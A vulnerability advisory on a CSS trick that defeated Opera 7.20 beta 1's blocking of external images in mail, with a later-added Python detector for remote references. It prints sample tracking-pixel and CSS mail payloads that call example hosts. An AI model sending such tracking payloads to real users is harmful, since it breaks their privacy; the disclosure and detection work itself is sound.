A vulnerability has been discovered in M2, the mail client in Opera 7.20, beta 1.

Impact of vulnerability:
------------------------
Minor.

Versions affected:
------------------
Opera 7.20 Beta 1, build 2981 only. All other Opera versions are safe.

Description:
------------
Opera’s mail client, M2, has an option to suppress viewing of external embeds, turned on by default, that protects M2 users from having their e-mail tracked. This mechanism can be circumvented through the use of CSS.

Discussion:
-----------
External embeds are typically used by senders of unsolicited commercial email, spam, to act as “read receipts” and are typically 0×0 invisible images stored on a server. The typical way a spammer can use such an image, from here on referred to as a mail bug, is by sending an HTML-formatted mail containing a link to an image stored on a mail server.

Example:

    <img src="http://exploit.example.com/img.gif?tracker=unique_tracker_id" width="0" height="0" />

The {unique_tracker_id} is a code unique to each mail sent out, and will give the spammer a confirmation that the mail sent out to a particular user was both received and opened.

Details:
--------
In Opera 7.20, when a mail is viewed in the mail client, an XML document is created, containing the mail headers and a mail body. Opera then uses CSS to apply style to this document.

    <omf:mime xmlns:omf="http://www.opera.com/2003/omf" xmlns:html="http://www.w3.org/TR/REC-html40">
      <html:link rel="stylesheet" href="file://localhost/C:\Program Files\Opera7\Styles\mime.css" type="text/css"/>
      <showheaders href="attachment:/135/headers.html">Display all headers</showheaders>
      <headers><hgrp>
        <hdr name="To"><n>To</n><v>john.doe@example.com</v></hdr>
      </hgrp></headers>
      <body id='omf_body_start'>
        <div class='document'>
          <rfc822 id='1058899906'>
            <html:body>
              { mail content goes here }
            </html:body>
          </omf:rfc822 id='1058899906'>
        </div>
      </body>
    </omf:mime>

When mail is displayed, it uses a stylesheet found in the file mime.css in the Styles subdirectory of the Opera installation folder. The mail headers and bodies are styled using namespace declarations in the mail:

    @namespace omf url(http://www.opera.com/2003/omf);
    @namespace html url(http://www.w3.org/TR/REC-html40);

    omf|headers { /* style definitions */ }

By sending a mail using Content-type: text/html, and embedding a mail with styles similar to the ones found in the Opera stylesheet, a malicious user could insert an image that is displayed in the header area of the mail. An example of such a mail could be:

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
    <style type="text/css">
    omf|headers { background-image: url(http://www.example.com/t.png) }
    </style>
    </head>
    <body>
    { Normal mail body here }
    </body>
    </html>

Opera 7.20 beta 1 will now display the image referenced in the style sheet, http://www.example.com/t.png, in the header area of the mail.

Solution:
---------
Either downgrade to Opera 7.11, or upgrade to Opera 7.20, beta 2, build 3014, as they are not affected by the problem.

Other:
------
Opera Software was notified of the problem on 2003-07-04 and acknowledged the problem the same day, but requested some time to create a fix.
Opera Software released Opera 7.20 beta 2, which fixed the problem, on 2003-07-22.

An HTML version of this alert can be found at <URL:http://www.virtuelvis.com/archives/111.html>

-- 
Arve Bersvendsen

http://www.virtuelvis.com
http://www.bersvendsen.com
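
The advisory shows that a filter for external embeds has to look at CSS as well as markup. The following is an added example, not code from the advisory or from Opera: a mail-body check that reports remote resources referenced from fetch-on-render attributes, inline style attributes and style elements. All names in it (ExternalRefFinder, find_external_refs, the sample constants) are hypothetical.

```python
import re
from html.parser import HTMLParser

# FETCH_ATTRS: attributes fetched on render. CSS_URL: url(...) and @import "..." in CSS.
FETCH_ATTRS = {"src", "background", "poster", "data"}
CSS_URL = re.compile(r"""url\(\s*['"]?([^'")\s]+)|@import\s+['"]([^'"]+)""", re.I)
REMOTE = re.compile(r"^(?:https?:)?//", re.I)

class ExternalRefFinder(HTMLParser):
    """Collects (location, url) pairs for remote resources in an HTML mail body."""
    def __init__(self):
        super().__init__()
        self.refs = []
        self._style = None  # buffer for the text of a <style> element

    def _scan_css(self, where, css):
        for m in CSS_URL.finditer(css):
            url = m.group(1) or m.group(2)
            if REMOTE.match(url):
                self.refs.append((where, url))

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self._style = []
        for name, value in attrs:
            value = (value or "").strip()
            if name == "style":
                self._scan_css(f"{tag}@style", value)
            elif (name in FETCH_ATTRS or (tag, name) == ("link", "href")) and REMOTE.match(value):
                self.refs.append((f"{tag}@{name}", value))

    def handle_data(self, data):
        if self._style is not None:
            self._style.append(data)

    def handle_endtag(self, tag):
        if tag == "style" and self._style is not None:
            self._scan_css("style", "".join(self._style))
            self._style = None

def find_external_refs(html_body):
    finder = ExternalRefFinder()
    finder.feed(html_body)
    finder.close()
    return finder.refs

# Sample inputs: the two mail bodies shown in the advisory, shortened.
IMG_BUG = '<img src="http://exploit.example.com/img.gif?tracker=unique_tracker_id" width="0" height="0" />'
CSS_BUG = '<html><head><style type="text/css">omf|headers { background-image: url(http://www.example.com/t.png) }</style></head><body>text</body></html>'
```

A client that suppresses external embeds would block or strip every reference this returns before rendering; ordinary hyperlinks and cid: attachments are not reported because they are not fetched when the mail is displayed.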